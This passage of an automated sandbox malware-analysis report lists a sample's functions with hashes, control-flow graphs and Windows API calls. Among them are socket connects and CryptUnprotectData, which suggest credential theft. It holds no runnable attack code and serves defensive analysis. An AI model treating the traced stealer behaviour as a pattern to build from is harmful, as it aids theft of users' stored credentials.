                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                    • String ID: BI^$DGFA$F]]EMEAB$KGNCE_$OAZ^D^T
                                                                                                                                                                                    • API String ID: 118556049-3591372289
                                                                                                                                                                                    • Opcode ID: fc1a92e41f1c06db32d94add58fc881242988efce6f55223c4b7c5c0f9979c7a
                                                                                                                                                                                    • Instruction ID: 80e77bc6c0ef72fadb4541734661ba6a30fb2c80f6abbaa69836d28e3887b88e
                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1a92e41f1c06db32d94add58fc881242988efce6f55223c4b7c5c0f9979c7a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E17D71D042889FCF05DBA8C885BDEBBB5AF5A300F14809DE449A7353EB349A48CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00054730 Relevance: 6.4, Strings: 4, Instructions: 1419COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: % "/$WI]B$cannot use operator[] with a string argument with $g,&=
                                                                                                                                                                                    • API String ID: 0-1972270083
                                                                                                                                                                                    • Opcode ID: 96c40f627e998b2cd5436bd404d50e7cce74ae25b597fbf1dcdf51d7db43f978
                                                                                                                                                                                    • Instruction ID: ab92e99f0d0454eb455982bcdf056e41bfb79678ca5836d69a72c7d62d4b7355
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96c40f627e998b2cd5436bd404d50e7cce74ae25b597fbf1dcdf51d7db43f978
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FC2E471D002588BDF19CF68CC557EEBBB1BF55305F148298D849AB282DB70AAC9CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0004DBB0 Relevance: 6.1, APIs: 4, Instructions: 99networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 25415 4dbb0-4dbe2 WSAStartup 25416 4dcb6-4dcbf 25415->25416 25417 4dbe8-4dc12 call 37d20 * 2 25415->25417 25422 4dc14-4dc18 25417->25422 25423 4dc1e-4dc64 25417->25423 25422->25416 25422->25423 25425 4dc66-4dc6c 25423->25425 25426 4dcb0 25423->25426 25427 4dcc4-4dcce 25425->25427 25428 4dc6e 25425->25428 25426->25416 25427->25426 25432 4dcd0-4dcd8 25427->25432 25429 4dc74-4dc88 socket 25428->25429 25429->25426 25430 4dc8a-4dc9a connect 25429->25430 25433 4dcc0 25430->25433 25434 4dc9c-4dca4 closesocket 25430->25434 25433->25427 25434->25429 25435 4dca6-4dcaa 25434->25435 25435->25426
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WSAStartup.WS2_32 ref: 0004DBDB
                                                                                                                                                                                    • socket.WS2_32(?,?,?,?,?,?,001660D8,?,?), ref: 0004DC7E
                                                                                                                                                                                    • connect.WS2_32(00000000,?,?,?,?,?,001660D8,?,?), ref: 0004DC92
                                                                                                                                                                                    • closesocket.WS2_32(00000000), ref: 0004DC9D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Startupclosesocketconnectsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3098855095-0
                                                                                                                                                                                    • Opcode ID: 163361e59263cacf85f7414f8dc72bc1f7cf581f05dacf91af4ef2372e339d9b
                                                                                                                                                                                    • Instruction ID: fefbc176166ff0b898049f662434b17b103f75d9cf61169525abf480dc49e649
                                                                                                                                                                                    • Opcode Fuzzy Hash: 163361e59263cacf85f7414f8dc72bc1f7cf581f05dacf91af4ef2372e339d9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D931E7B25043015BC7219B289C8566FB7E5FFCA734F005F2AF9A8922D0E771E8048696
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00060890 Relevance: 2.1, APIs: 1, Instructions: 554COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0003B8E0: __fread_nolock.LIBCMT ref: 0003B9CF
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0006097E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init__fread_nolockstd::locale::_
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 221842284-0
                                                                                                                                                                                    • Opcode ID: f7bee2c4120008a7dfc8d502cde9f76a3bbcb3b0ca0d925f2b75f8abc8cef221
                                                                                                                                                                                    • Instruction ID: 462903f9322edce29a9520ed86c0a7841109163150c95919c8cb5851822867db
                                                                                                                                                                                    • Opcode Fuzzy Hash: f7bee2c4120008a7dfc8d502cde9f76a3bbcb3b0ca0d925f2b75f8abc8cef221
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7922F371910248CBDF18DF68CC897EEBBB2AF55304F14829CE449AB682D7759A84CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000C45E0 Relevance: 2.0, APIs: 1, Instructions: 471COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C4A76
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 885266447-0
                                                                                                                                                                                    • Opcode ID: 0e19c762ae4f3687b5384dc08e2991a1b69916aab9515302221636a0b698fdcd
                                                                                                                                                                                    • Instruction ID: 21f4afc0f6529aa5a48a4f25908027cbaf2db7b054a4e3d200c11ca37058409a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e19c762ae4f3687b5384dc08e2991a1b69916aab9515302221636a0b698fdcd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 880246706047418FD7A4CF29C860F6EB7E5BF89314F14492DE48ACB661EB70E949CB52
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0004FEE0 Relevance: 1.6, APIs: 1, Instructions: 123encryptionCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0004FFF8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                                                                    • Opcode ID: cebe8588e0aa3825f373b7790c24a316815082a85bf9e90fa2d200f11d5b3e3f
                                                                                                                                                                                    • Instruction ID: 89a3d44a738e49d1abb007f5c6e9e75a5fe34657af3c83e4e588cffc1293bd06
                                                                                                                                                                                    • Opcode Fuzzy Hash: cebe8588e0aa3825f373b7790c24a316815082a85bf9e90fa2d200f11d5b3e3f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 723123B14106014BE33C9E28EC4876BB6E5EF91320F044A3DF89587EC2D774E8898BD9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0010B4E5 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,000A2DBA,?,761B23A0), ref: 0010B500
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: 58ff7708f50b6239437c2590bf74b47e2c1a5fc0a3fcfe77e3249276eb37e0f2
                                                                                                                                                                                    • Instruction ID: bfaf1a7ad59c281598c71a31efea63a95bf5e6f2728f3ccce39977f58ccb9a7b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58ff7708f50b6239437c2590bf74b47e2c1a5fc0a3fcfe77e3249276eb37e0f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECE08C72149108BEEB216F788C40CBB779DEF15324F100924FD94D20E0D7B2AD21A6A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0011970D Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3b0a575c58fab40e379999f37ce5bc5859c5068ae2815ff139686ee5c1f44b78
                                                                                                                                                                                    • Instruction ID: 5e3aa01c6ffad44c33fe0cda2c6910936027b54e794b2928bec1bc4845d837da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0a575c58fab40e379999f37ce5bc5859c5068ae2815ff139686ee5c1f44b78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB1C07090460E8BCB2CCE68C5B56FEBBA5AF15304F18063DD5B2A7691D731AEC2CB51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D10D98 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2740572993.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d10000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 102c7d89768c1354ddefb92601a517aea31b380fe7e1d2889d106314349dc92c
                                                                                                                                                                                    • Instruction ID: 9153b3b52ee350913a91dbec6ccf5ff21e4da9788d34a99cf5e8f116026b8883
                                                                                                                                                                                    • Opcode Fuzzy Hash: 102c7d89768c1354ddefb92601a517aea31b380fe7e1d2889d106314349dc92c
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE217FFB34C114BDB143E5827B90AFA676EE6C66307318427FC87D1912F395AE892131
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 04D803A0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2756924314.0000000004D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_4d80000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7aefacef5c6a3162f357e5e398b5edbb2383c402df41d6e0f094bd69c82e7f37
                                                                                                                                                                                    • Instruction ID: 9c2a80226382e3ba51f83b60d6c5a948b8bef1b1190e3d3101ea315fe243b3b7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7aefacef5c6a3162f357e5e398b5edbb2383c402df41d6e0f094bd69c82e7f37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D114CB374D294AFE703E5995A118BB3F29D9CB230326805FE486CA113F151E94DA262
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0009C5A0 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 519COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 24622 9c5a0-9c5e4 24623 9c5ea-9c682 24622->24623 24624 9ca53-9ca8c call a4680 call 9e780 24622->24624 24628 9c684-9c691 24623->24628 24629 9c697-9c6d7 call 97810 call 9ebf0 24623->24629 24635 9cc1c-9cc20 24624->24635 24636 9ca92-9cb26 call 9db10 call 38080 call 9e1c0 call a5b10 24624->24636 24628->24629 24646 9c6d9-9c6ec 24629->24646 24647 9c6f6-9c71e call a3580 call 9e780 24629->24647 24638 9cc6d-9cc72 24635->24638 24639 9cc22-9cc5f call 97810 call 938b0 24635->24639 24671 9cb28-9cb34 24636->24671 24672 9cb54-9cba2 call 10e254 * 2 24636->24672 24641 9cc78 24638->24641 24642 9c974-9c986 24638->24642 24639->24642 24659 9cc65 24639->24659 24651 9cc80 call 112350 24641->24651 24646->24647 24666 9c8a9-9c8b0 24647->24666 24667 9c724-9c7b8 call 9db10 call 38080 call 9e1c0 call a4640 24647->24667 24661 9cc85 call 112350 24651->24661 24659->24638 24669 9cc8a-9cc99 call 112350 24661->24669 24674 9c989-9c98c 24666->24674 24675 9c8b6-9c901 call 97810 call 938b0 * 2 24666->24675 24734 9c7ba-9c7c6 24667->24734 24735 9c7e6-9c831 call 10e254 * 2 24667->24735 24690 9cc9b-9cca5 24669->24690 24691 9ccc3-9ccd6 24669->24691 24680 9cb4a-9cb51 call 10d0b2 24671->24680 24681 9cb36-9cb44 24671->24681 24714 9cbd3-9cbf2 24672->24714 24715 9cba4-9cbb3 24672->24715 24678 9c9ca-9c9dd call 938b0 24674->24678 24679 9c98e-9c9c5 call 97810 call 938b0 24674->24679 24726 9c921-9c93f call 92fc0 * 2 24675->24726 24727 9c903-9c917 24675->24727 24704 9c9fd-9ca1b call 92fc0 * 2 24678->24704 24705 9c9df-9c9f3 24678->24705 24679->24678 24680->24672 24681->24669 24681->24680 24698 9ccb9-9ccbb call 10d0b2 24690->24698 24699 9cca7-9ccb5 24690->24699 24710 9ccc0 24698->24710 24707 9ccd7-9ccdf call 112350 24699->24707 24708 9ccb7 24699->24708 24704->24642 24737 9ca21-9ca34 24704->24737 24705->24704 24708->24698 24710->24691 24714->24635 24721 9cbf4-9cc00 24714->24721 24716 9cbc9-9cbd0 call 10d0b2 24715->24716 24717 9cbb5-9cbc3 24715->24717 24716->24714 24717->24669 24717->24716 24728 9cc12-9cc19 call 10d0b2 24721->24728 24729 9cc02-9cc10 24721->24729 24726->24642 24756 9c941-9c954 24726->24756 24727->24726 24728->24635 24729->24669 24729->24728 24740 9c7c8-9c7d6 24734->24740 24741 9c7dc-9c7e3 call 10d0b2 24734->24741 24757 9c85f-9c87b 24735->24757 24758 9c833-9c83f 24735->24758 24745 9c96a-9c971 call 10d0b2 24737->24745 24746 9ca3a-9ca48 24737->24746 24740->24651 24740->24741 24741->24735 24745->24642 24746->24661 24751 9ca4e 24746->24751 24751->24745 24756->24745 24759 9c956-9c964 24756->24759 24757->24666 24762 9c87d-9c889 24757->24762 24760 9c841-9c84f 24758->24760 24761 9c855-9c85c call 10d0b2 24758->24761 24759->24661 24759->24745 24760->24651 24760->24761 24761->24757 24764 